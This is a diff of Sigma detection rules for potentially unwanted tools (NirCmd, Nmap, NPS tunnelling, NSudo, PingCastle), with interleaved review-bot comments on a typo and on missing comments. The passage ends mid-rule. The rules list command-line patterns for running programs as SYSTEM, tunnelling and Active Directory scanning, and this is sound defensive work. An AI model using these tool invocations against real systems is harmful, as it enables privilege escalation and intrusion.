@@ -1,8 +1,7 @@ title: PUA - NirCmd Execution id: 4e2ed651-1906-4a59-a78a-18220fca1b22 status: test -description: Detects the use of NirCmd tool for command execution, which could be - the result of legitimate administrative activity +description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity references: - https://www.nirsoft.net/utils/nircmd.html - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ @@ -22,20 +21,20 @@ detection: EventID: 4688 Channel: Security selection_org: - - NewProcessName|endswith: \NirCmd.exe - - OriginalFileName: NirCmd.exe + - NewProcessName|endswith: \NirCmd.exe + - OriginalFileName: NirCmd.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' execmd ' - '.exe script ' - '.exe shexec ' - ' runinteractive ' combo_exec: - CommandLine|contains: + CommandLine|contains: - ' exec ' - ' exec2 ' combo_exec_params: - CommandLine|contains: + CommandLine|contains: - ' show ' - ' hide ' condition: process_creation and (1 of selection_* or all of combo_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml index c5077588e..ed00f19bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd_as_system.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' runassystem ' + CommandLine|contains: ' runassystem ' condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml index e1bbca97f..b893892bd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_pua_nmap_zenmap.yml @@ -1,9 +1,7 @@ title: PUA - Nmap/Zenmap Execution id: f6ecd1cf-19b8-4488-97f6-00f0924991a3 status: test -description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing - of services running on remote hosts, including those that may be vulnerable to - remote software exploitation +description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation references: - https://nmap.org/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows @@ -21,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \nmap.exe - - \zennmap.exe - - OriginalFileName: - - nmap.exe - - zennmap.exe + - NewProcessName|endswith: + - \nmap.exe + - \zennmap.exe + - OriginalFileName: + - nmap.exe + - zennmap.exe condition: process_creation and selection falsepositives: - Legitimate administrator activity diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml index bbbefeaaf..4ab624d66 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nps.yml @@ -1,8 +1,7 @@ title: PUA - NPS Tunneling Tool Execution id: 68d37776-61db-42f5-bf54-27e87072d17e status: test -description: Detects the use of NPS, a port forwarding and intranet penetration proxy - server +description: Detects the use of NPS, a port forwarding and intranet penetration proxy server references: - https://github.com/ehang-io/nps author: Florian Roth (Nextron Systems) 
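Review bot: Both `\zennmap.exe` and `zennmap.exe` in the second hunk (`@@ -21,12 +19,12 @@`) spell the Zenmap executable with a doubled `n`; as far as I know the GUI shipped with Nmap for Windows is `zenmap.exe`, so these two entries never match and the rule currently only covers `nmap.exe`. Unless the doubled spelling is intentional, the lines should read `- \zenmap.exe` and `- zenmap.exe`. The first hunk on this file carries a related typo in the description, `namp/zenmap` for `nmap/zenmap`.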
@@ -19,22 +18,23 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \npc.exe + NewProcessName|endswith: \npc.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -server=' - ' -vkey=' - ' -password=' selection_cli_2: - CommandLine|contains: ' -config=npc' + CommandLine|contains: ' -config=npc' selection_hashes: - - Hashes|contains: - - MD5=AE8ACF66BFE3A44148964048B826D005 - - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181 - - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856 - - md5: ae8acf66bfe3a44148964048b826d005 - - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181 - - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856 + # v0.26.10 + - Hashes|contains: + - MD5=AE8ACF66BFE3A44148964048B826D005 + - SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181 + - SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856 + - md5: ae8acf66bfe3a44148964048b826d005 + - sha1: cea49e9b9b67f3a13ad0be1c2655293ea3c18181 + - sha256: 5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856 condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml index 79ec25aeb..e8cfa9383 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nsudo.yml 
@@ -20,22 +20,24 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \NSudo.exe - - \NSudoLC.exe - - \NSudoLG.exe - - OriginalFileName: - - NSudo.exe - - NSudoLC.exe - - NSudoLG.exe + - NewProcessName|endswith: + - \NSudo.exe + - \NSudoLC.exe + - \NSudoLG.exe + - OriginalFileName: + - NSudo.exe + - NSudoLC.exe + - NSudoLG.exe selection_cli: - CommandLine|contains: - - '-U:S ' - - '-U:T ' - - '-U:E ' - - '-P:E ' - - '-M:S ' - - '-M:H ' + CommandLine|contains: + # Covers Single/Double dash "-"/"--" + ":" + - '-U:S ' # System + - '-U:T ' # Trusted Installer + - '-U:E ' # Elevated + - '-P:E ' # Enable All Privileges + - '-M:S ' # System Integrity + - '-M:H ' # High Integrity + # Covers Single/Double dash "-"/"--" + "=" - '-U=S ' - '-U=T ' - '-U=E ' diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml index b1d287739..dc926e363 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle.yml @@ -1,11 +1,10 @@ title: PUA - PingCastle Execution id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c related: - - id: b37998de-a70b-4f33-b219-ec36bf433dc0 - type: derived + - id: b37998de-a70b-4f33-b219-ec36bf433dc0 + type: derived status: experimental -description: Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level. +description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ 
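Review bot: The per-flag comments added to the `:` group (`# System`, `# Trusted Installer`, …) are not mirrored on the `=` group that follows `# Covers Single/Double dash "-"/"--" + "="`, so a reader has to map `'-U=S '` back to the first list to learn what it means. Either repeat the comments there or change the group header to `# Covers Single/Double dash "-"/"--" + "="; same meanings as the ":" group above`. The `selection_cli` list continues past the end of the hunk.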
@@ -27,162 +26,164 @@ detection: EventID: 4688 Channel: Security selection: - - Hashes|contains: - - MD5=f741f25ac909ee434e50812d436c73ff - - MD5=d40acbfc29ee24388262e3d8be16f622 - - MD5=01bb2c16fadb992fa66228cd02d45c60 - - MD5=9e1b18e62e42b5444fc55b51e640355b - - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 - - MD5=324579d717c9b9b8e71d0269d13f811f - - MD5=63257a1ddaf83cfa43fe24a3bc06c207 - - MD5=049e85963826b059c9bac273bb9c82ab - - MD5=ecb98b7b4d4427eb8221381154ff4cb2 - - MD5=faf87749ac790ec3a10dd069d10f9d63 - - MD5=f296dba5d21ad18e6990b1992aea8f83 - - MD5=93ba94355e794b6c6f98204cf39f7a11 - - MD5=a258ef593ac63155523a461ecc73bdba - - MD5=97000eb5d1653f1140ee3f47186463c4 - - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 - - MD5=32fe9f0d2630ac40ea29023920f20f49 - - MD5=a05930dde939cfd02677fc18bb2b7df5 - - MD5=124283924e86933ff9054a549d3a268b - - MD5=ceda6909b8573fdeb0351c6920225686 - - MD5=60ce120040f2cd311c810ae6f6bbc182 - - MD5=2f10cdc5b09100a260703a28eadd0ceb - - MD5=011d967028e797a4c16d547f7ba1463f - - MD5=2da9152c0970500c697c1c9b4a9e0360 - - MD5=b5ba72034b8f44d431f55275bace9f8b - - MD5=d6ed9101df0f24e27ff92ddab42dacca - - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d - - MD5=5e083cd0143ae95a6cb79b68c07ca573 - - MD5=28caff93748cb84be70486e79f04c2df - - MD5=9d4f12c30f9b500f896efd1800e4dd11 - - MD5=4586f7dd14271ad65a5fb696b393f4c0 - - MD5=86ba9dddbdf49215145b5bcd081d4011 - - MD5=9dce0a481343874ef9a36c9a825ef991 - - MD5=85890f62e231ad964b1fda7a674747ec - - MD5=599be548da6441d7fe3e9a1bb8cb0833 - - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 - - MD5=32d45718164205aec3e98e0223717d1d - - MD5=6ff5f373ee7f794cd17db50704d00ddb - - MD5=88efbdf41f0650f8f58a3053b0ca0459 - - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 - - MD5=781fa16511a595757154b4304d2dd350 - - MD5=5018ec39be0e296f4fc8c8575bfa8486 - - MD5=f4a84d6f1caf0875b50135423d04139f - - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b - - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 - - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d - - 
SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f - - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa - - SHA1=f14c9633040897d375e3069fddc71e859f283778 - - SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc - - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 - - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 - - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b - - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc - - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 - - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 - - SHA1=607e1fa810c799735221a609af3bfc405728c02d - - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 - - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a - - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 - - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 - - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 - - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 - - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea - - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 - - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 - - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad - - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 - - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 - - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 - - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a - - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db - - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 - - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 - - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 - - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c - - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d - - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 - - SHA1=c82152cddf9e5df49094686531872ecd545976db - - SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 - - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 - - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 - - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d - - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 - - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 - - 
SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b - - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 - - SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 - - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 - - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f - - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a - - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 - - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b - - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 - - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae - - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 - - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a - - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 - - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 - - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 - - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef - - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d - - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 - - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b - - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b - - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 - - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 - - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca - - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea - - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 - - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 - - 
SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 - - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 - - SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 - - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 - - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 - - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 - - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 - - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d - - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 - - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 - - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 - - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 - - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 - - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 - - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 - - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd - - NewProcessName|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - Hashes|contains: + # PingCastle.exe + - MD5=f741f25ac909ee434e50812d436c73ff + 
- MD5=d40acbfc29ee24388262e3d8be16f622 + - MD5=01bb2c16fadb992fa66228cd02d45c60 + - MD5=9e1b18e62e42b5444fc55b51e640355b + - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 + - MD5=324579d717c9b9b8e71d0269d13f811f + - MD5=63257a1ddaf83cfa43fe24a3bc06c207 + - MD5=049e85963826b059c9bac273bb9c82ab + - MD5=ecb98b7b4d4427eb8221381154ff4cb2 + - MD5=faf87749ac790ec3a10dd069d10f9d63 + - MD5=f296dba5d21ad18e6990b1992aea8f83 + - MD5=93ba94355e794b6c6f98204cf39f7a11 + - MD5=a258ef593ac63155523a461ecc73bdba + - MD5=97000eb5d1653f1140ee3f47186463c4 + - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 + - MD5=32fe9f0d2630ac40ea29023920f20f49 + - MD5=a05930dde939cfd02677fc18bb2b7df5 + - MD5=124283924e86933ff9054a549d3a268b + - MD5=ceda6909b8573fdeb0351c6920225686 + - MD5=60ce120040f2cd311c810ae6f6bbc182 + - MD5=2f10cdc5b09100a260703a28eadd0ceb + - MD5=011d967028e797a4c16d547f7ba1463f + - MD5=2da9152c0970500c697c1c9b4a9e0360 + - MD5=b5ba72034b8f44d431f55275bace9f8b + - MD5=d6ed9101df0f24e27ff92ddab42dacca + - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d + - MD5=5e083cd0143ae95a6cb79b68c07ca573 + - MD5=28caff93748cb84be70486e79f04c2df + - MD5=9d4f12c30f9b500f896efd1800e4dd11 + - MD5=4586f7dd14271ad65a5fb696b393f4c0 + - MD5=86ba9dddbdf49215145b5bcd081d4011 + - MD5=9dce0a481343874ef9a36c9a825ef991 + - MD5=85890f62e231ad964b1fda7a674747ec + - MD5=599be548da6441d7fe3e9a1bb8cb0833 + - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 + - MD5=32d45718164205aec3e98e0223717d1d + - MD5=6ff5f373ee7f794cd17db50704d00ddb + - MD5=88efbdf41f0650f8f58a3053b0ca0459 + - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 + - MD5=781fa16511a595757154b4304d2dd350 + - MD5=5018ec39be0e296f4fc8c8575bfa8486 + - MD5=f4a84d6f1caf0875b50135423d04139f + - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b + - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 + - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d + - SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f + - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa + - SHA1=f14c9633040897d375e3069fddc71e859f283778 + - 
SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc + - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 + - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 + - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b + - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc + - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 + - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 + - SHA1=607e1fa810c799735221a609af3bfc405728c02d + - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 + - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a + - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 + - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 + - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 + - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 + - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea + - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 + - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 + - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad + - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 + - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 + - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 + - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a + - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db + - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 + - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 + - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 + - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c + - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d + - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 + - SHA1=c82152cddf9e5df49094686531872ecd545976db + - SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 + - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 + - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 + - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d + - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 + - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 + - SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b + - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 + - 
SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 + - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 + - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f + - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a + - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 + - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b + - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 + - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae + - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 + - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a + - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 + - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 + - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 + - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef + - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d + - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 + - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b + - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b + - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 + - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 + - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca + - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea + - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 + - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 + - SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 + - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 + - 
SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 + - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 + - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 + - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 + - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 + - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d + - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 + - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 + - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 + - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 + - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 + - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 + - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 + - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd + - NewProcessName|endswith: \PingCastle.exe + - OriginalFileName: PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' condition: process_creation and selection falsepositives: - Unknown +# Note: As this is a PUA the level may vary depending on your environment. Reduce or increase the level as you see fit level: medium ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml index 47a02d561..953010b04 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml @@ -1,14 +1,11 @@ title: PUA - PingCastle Execution From Potentially Suspicious Parent id: b37998de-a70b-4f33-b219-ec36bf433dc0 related: - - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c - type: derived + - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c + type: derived status: experimental -description: 'Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level via a script located in a potentially suspicious - or uncommon location. - - ' +description: | + Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ 
@@ -53,45 +50,44 @@ detection: - \AppData\Roaming\ - \Temporary Internet selection_parent_path_2: - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ selection_cli: - - NewProcessName|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' - condition: process_creation and (1 of selection_parent_* and selection_parent_ext - and selection_cli) + - NewProcessName|endswith: \PingCastle.exe + - OriginalFileName: 